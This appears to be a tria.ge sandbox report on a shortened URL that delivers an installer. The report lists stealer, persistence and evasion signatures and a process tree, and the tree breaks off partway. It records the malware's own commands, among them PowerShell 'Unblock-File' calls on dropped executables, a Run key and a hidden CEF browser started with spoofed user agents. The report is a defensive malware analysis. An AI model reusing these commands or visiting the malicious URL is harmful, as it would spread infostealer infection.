Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://ify.ac/1IZk

windows10-2004-x64

10

https://ify.ac/1IZk

windows10-1703-x64

8

https://ify.ac/1IZk

windows10-2004-x64

10

https://ify.ac/1IZk

windows11-21h2-x64

10

https://ify.ac/1IZk

android-11-x64

1

https://ify.ac/1IZk

ubuntu-24.04-amd64

4

Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16/07/2024, 05:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://ify.ac/1IZk

Score
8/10
discoveryexecutionpersistencespywarestealer

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 42 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • NSIS installer 2 IoCs
    installer
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Control Panel 10 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
    evasionspywaretrojan
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "https://ify.ac/1IZk"
    1⤵
      PID:3620
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:208
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • NTFS ADS
      PID:4956
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1612
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:3832
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies registry class
      PID:4556
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies registry class
      PID:484
    • C:\Windows\System32\DataExchangeHost.exe
      C:\Windows\System32\DataExchangeHost.exe -Embedding
      1⤵
        PID:4620
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Drops file in Windows directory
        • Modifies registry class
        PID:4236
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
        • Modifies registry class
        PID:864
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:1396
        • C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe
          "C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:3888
          • C:\Users\Admin\AppData\Local\Temp\is-H4EOL.tmp\setup_ZIccnliaeT.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-H4EOL.tmp\setup_ZIccnliaeT.tmp" /SL5="$3043E,6111556,56832,C:\Users\Admin\Desktop\setup_ZIccnliaeT.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
              3⤵
                PID:1904
              • C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
                "C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 7c8e947828b1704c470f20016c0ff497
                3⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3416
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 816
                  4⤵
                  • Program crash
                  PID:1768
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 800
                  4⤵
                  • Program crash
                  PID:4964
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 860
                  4⤵
                  • Program crash
                  PID:4204
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 964
                  4⤵
                  • Program crash
                  PID:3148
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 996
                  4⤵
                  • Program crash
                  PID:2060
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 976
                  4⤵
                  • Program crash
                  PID:344
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1036
                  4⤵
                  • Program crash
                  PID:2824
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 996
                  4⤵
                  • Program crash
                  PID:2280
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1028
                  4⤵
                  • Program crash
                  PID:2064
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 992
                  4⤵
                  • Program crash
                  PID:2836
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1288
                  4⤵
                  • Program crash
                  PID:492
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1572
                  4⤵
                  • Program crash
                  PID:2628
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1624
                  4⤵
                  • Program crash
                  PID:2636
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1488
                  4⤵
                  • Program crash
                  PID:3556
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1672
                  4⤵
                  • Program crash
                  PID:4524
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1644
                  4⤵
                  • Program crash
                  PID:3372
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1492
                  4⤵
                  • Program crash
                  PID:3552
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1908
                  4⤵
                  • Program crash
                  PID:1904
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1940
                  4⤵
                  • Program crash
                  PID:4828
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1040
                  4⤵
                  • Program crash
                  PID:564
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1648
                  4⤵
                  • Program crash
                  PID:4392
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1756
                  4⤵
                  • Program crash
                  PID:2628
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1964
                  4⤵
                  • Program crash
                  PID:3556
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1940
                  4⤵
                  • Program crash
                  PID:3968
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2036
                  4⤵
                  • Program crash
                  PID:212
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2052
                  4⤵
                  • Program crash
                  PID:624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2168
                  4⤵
                  • Program crash
                  PID:3836
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2200
                  4⤵
                  • Program crash
                  PID:3884
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1644
                  4⤵
                  • Program crash
                  PID:4828
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2128
                  4⤵
                  • Program crash
                  PID:4428
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1684
                  4⤵
                  • Program crash
                  PID:564
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1980
                  4⤵
                  • Program crash
                  PID:720
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2128
                  4⤵
                  • Program crash
                  PID:4664
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2228
                  4⤵
                  • Program crash
                  PID:4476
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1904
                  4⤵
                  • Program crash
                  PID:1720
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1108
                  4⤵
                  • Program crash
                  PID:4292
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2044
                  4⤵
                  • Program crash
                  PID:212
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1644
                  4⤵
                  • Program crash
                  PID:2864
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1684
                  4⤵
                  • Program crash
                  PID:1904
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2232
                  4⤵
                  • Program crash
                  PID:4204
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\s54sPhUD\RCAwbRvEExcoI1iGpak.exe"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2624
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\s54sPhUD\RCAwbRvEExcoI1iGpak.exe"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:420
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2264
                  4⤵
                  • Program crash
                  PID:2136
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2356
                  4⤵
                  • Program crash
                  PID:2416
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\Ir1FlN4su2X.exe"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3968
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\Ir1FlN4su2X.exe"
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3552
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 2432
                  4⤵
                  • Program crash
                  PID:3964
                • C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\Ir1FlN4su2X.exe
                  C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\Ir1FlN4su2X.exe /sid=3 /pid=1090
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2140
                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Adds Run key to start application
                    PID:10980
                    • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                      C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                      6⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Modifies Control Panel
                      PID:4136
                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2724 --field-trial-handle=2728,i,17737295831856342134,6263487293838825874,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3108
                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 --field-trial-handle=2728,i,17737295831856342134,6263487293838825874,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3312
                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 --field-trial-handle=2728,i,17737295831856342134,6263487293838825874,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1320
                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=2728,i,17737295831856342134,6263487293838825874,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                        7⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:3728
                      • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2728,i,17737295831856342134,6263487293838825874,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                        7⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:796
                        • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                          "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                          8⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Modifies Control Panel
                          PID:7016
                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2688 --field-trial-handle=2692,i,10179908328090784364,7198218002121605618,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                            9⤵
                            • Executes dropped EXE
                            PID:6744
                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3004 --field-trial-handle=2692,i,10179908328090784364,7198218002121605618,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                            9⤵
                            • Executes dropped EXE
                            PID:7324
                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3024 --field-trial-handle=2692,i,10179908328090784364,7198218002121605618,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                            9⤵
                            • Executes dropped EXE
                            PID:7332
                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2692,i,10179908328090784364,7198218002121605618,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:7340
                          • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                            "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=2692,i,10179908328090784364,7198218002121605618,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
                            9⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            PID:7348
                            • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                              "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
                              10⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Modifies Control Panel
                              PID:7972
                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 9; CPH1923) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2692 --field-trial-handle=2696,i,9726611169415515375,12609946107417687254,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
                                11⤵
                                • Executes dropped EXE
                                PID:8312
                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
                                "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 9; CPH1923) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2824 --field-trial-handle=2696,i,9726611169415515375,12609946107417687254,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
                                11⤵
                                • Executes dropped EXE
                                PID:8316
                              • C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
